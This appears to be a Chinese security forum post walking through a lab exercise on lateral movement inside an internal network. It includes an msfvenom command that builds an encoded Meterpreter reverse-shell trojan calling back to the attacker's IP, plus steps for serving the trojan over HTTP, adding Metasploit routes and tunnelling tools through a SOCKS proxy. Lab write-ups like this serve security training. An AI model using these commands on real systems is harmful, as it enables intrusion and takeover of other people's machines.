用户
搜索

[内网攻防] 内网横向移动

  • TA的每日心情
    开心
    2021-2-5 09:55
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    6

    主题

    26

    帖子

    149

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2020-12-14
    发表于 2021-3-15 16:02:02 33251
    本帖最后由 为你而来 于 2021-3-15 16:04 编辑

    内网横向移动
    1实验环境准备
    攻击机: kali2020  ip:192.168.43.10
    跳板机: win2008  ip:192.168.43.6  ip:172.10.1.1
    内网服务器:win7  ip:172.10.1.2
    前期工作攻击机制作钓鱼木马,诱导跳板机上线,跳板机与攻击机建立会话
    步骤1 攻击机制作生成木马
    msfVENOM  -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.10 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >msf.exe
    图片1.png
    步骤2 攻击机开启python,开启简单的http server,通过web服务来传送木马
    python -m SimpleHTTPServer 888
    图片2.png
    步骤3 攻击机开启监听模式
    图片3.png
    步骤4,跳板机win08下载木马,并运行
    图片4.png
    步骤5攻击机kali上弹出会话,并提升到系统权限
    图片5.png

    内网横向移动
    拿下跳板机系统权限后,攻击机可以查看跳板机的数据,但是与内网区域的win7主机无法联通,为了扩大攻击战果,我们可以使用代理和端口转发获得更多内网中主机权限,得到更多的数据
    1拿下跳板机查看网络信息ipconfig,可以查看到跳板机win7有两块网卡,IP地址分别为192.168.43.6和172.10.1.1
    二11.png
    二22.png

    2自动添加路由
    meterpreter > run post/multi/manage/autoroute
    二2.png
    3查看内网区域172.10网段那些主机是在线的,用arp扫描,发现172.10.1.2和172.10.1.1两台主机在线
    二3.png
    4经过分析ip172.10.1.1是win08跳板机,为了扩大攻击战果,下一步进行横向移动,获取ip172.10.1.2的权限。步骤2中添加的自动路由只能在meterpreter中起作用,出了meterpreter使用其他工具自动路由就不起作用了,为了能在meterpreter会话外使用其他工具,我们可以建立socket代理,进行流量转发
    二4.png
    5设置本地监听地址为192.168.43.10(set srvhost=192.168.43.10),查看配置本地默认监听端口为1080,设置完后并执行
    二5.png
    6修改proxychains.conf,修改地址与端口,与步骤5中设置的本地监听地址与端口一致,并保存
    二61.png
    二62.png
    7配置完后,使用其他工具,在前面加上proxychains
    二7.png

    发表于 2021-3-17 16:37:13
    感谢分享
    使用道具 举报 回复

    有看不懂的欢迎提问哟
    使用道具 举报 回复
    发表于 2021-4-2 15:26:49
    继续加油表哥
    让我们一起干大事!
    有兴趣的表哥加村长QQ:780876774!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册